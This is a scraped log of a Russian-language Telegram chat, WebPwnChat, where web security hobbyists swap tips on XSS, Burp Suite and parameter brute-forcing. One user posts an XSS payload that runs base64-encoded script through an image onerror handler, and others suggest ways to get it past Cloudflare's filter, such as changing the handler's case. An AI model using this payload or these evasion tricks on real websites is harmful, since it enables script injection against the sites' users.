В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

WebPwnChat

992 membersпожаловаться на группу
2020 April 24

👾0

👾 0x1 in WebPwnChat
подскажите плз с реализацией xss, так что бы не блокал cf, взял с xss hunter пейлоад, через картинку проходит:
источник
12:56пожаловаться#1

👾0

👾 0x1 in WebPwnChat
"><img src=x id=base64_тут&#61;&#61; onerror=eval(atob(this.id))>
источник
12:56пожаловаться#2

👾0

👾 0x1 in WebPwnChat
при этом ломает вертку таким образом
источник
12:57пожаловаться#3

👾0

👾 0x1 in WebPwnChat
не могу никак понять что именно, пробовал &#61;&#61; (дабл кавычка) ставить везде, но еще хуже выходит
источник
12:57пожаловаться#4

M

Mykola in WebPwnChat
Ребята, кто знает возможно ли остановить extender scan в burp?
источник
15:01пожаловаться#5

C

Ch0c0"><!-- in WebPwnChat
Austin Augie
такая фича раньше у киви была. что можно было менять пасс и сидеть в приложении дальше себе
Такая фича была у майл.ру
источник
15:02пожаловаться#6

AA

Austin Augie in WebPwnChat
👾 0x1
подскажите плз с реализацией xss, так что бы не блокал cf, взял с xss hunter пейлоад, через картинку проходит:
Тебе нужно воспроизвести хсс или конкретно пропхнуть пейлоад этот?
источник
15:03пожаловаться#7

👾0

👾 0x1 in WebPwnChat
пейлоад пропихнуть
источник
15:03пожаловаться#8

👾0

👾 0x1 in WebPwnChat
но тут трабл либо блочит cf, либо из-за попыток обойти cf выкрученными пейлоадами - ломает div'ы
источник
15:04пожаловаться#9

C

Ch0c0"><!-- in WebPwnChat
В агенте сессия не заканчивалась при смене пароля
источник
15:04пожаловаться#10

AA

Austin Augie in WebPwnChat
👾 0x1
пейлоад пропихнуть
Попробуй в свой пейлоад вставить OnError вместо onerror
источник
15:06пожаловаться#11

👾0

👾 0x1 in WebPwnChat
Austin Augie
Попробуй в свой пейлоад вставить OnError вместо onerror
пробовал, тут дело именно в &#61;&#61; или любой другой сущностью кавычек, ибо с ней ломается все, без - cf block
источник
15:07пожаловаться#12

NM

Never Mind in WebPwnChat
Ch0c0">

M

Mykola in WebPwnChat
Ребята, кто-то знает тулзу для брутефорса параметров multipart/form-data?
источник
17:51пожаловаться#14

M

Mykola in WebPwnChat
Param miner - не работает с таким типом
источник
17:51пожаловаться#15

BF

Billy Fox in WebPwnChat
Mykola
Ребята, кто-то знает тулзу для брутефорса параметров multipart/form-data?
Это которые вот эти?
foo ----------
bar
bar ----------
foo
источник
17:52пожаловаться#16

M

Mykola in WebPwnChat
Да
источник
17:52пожаловаться#17

BF

Billy Fox in WebPwnChat
Не знаю таких(
источник
17:52пожаловаться#18

M

Mandel Ivanovich in WebPwnChat
Mykola
Ребята, кто-то знает тулзу для брутефорса параметров multipart/form-data?
а бекенду точно именно мультипарт требуется? может конвертнуть берпом "change body encoding" и потом в парам майнер пульнуть??
источник
18:01пожаловаться#19

M

Mykola in WebPwnChat
Mandel Ivanovich
а бекенду точно именно мультипарт требуется? может конвертнуть берпом "change body encoding" и потом в парам майнер пульнуть??
Скорее всего. Потому на все другие Content-Type сервер отвечает тем же самым запросом которой я отправил.

{"abc": 1 }  => {"abc": 1}  

<h1>123</h1>  => <h1>123</h1>

Но вот при  multipart/form-data -  

Required request body is missing: public java.lang.String com.blablabla.method(java.util.Map&lt;java.lang.String, java.lang.String&gt;,java.lang.String,java.lang.String)
источник
18:06пожаловаться#20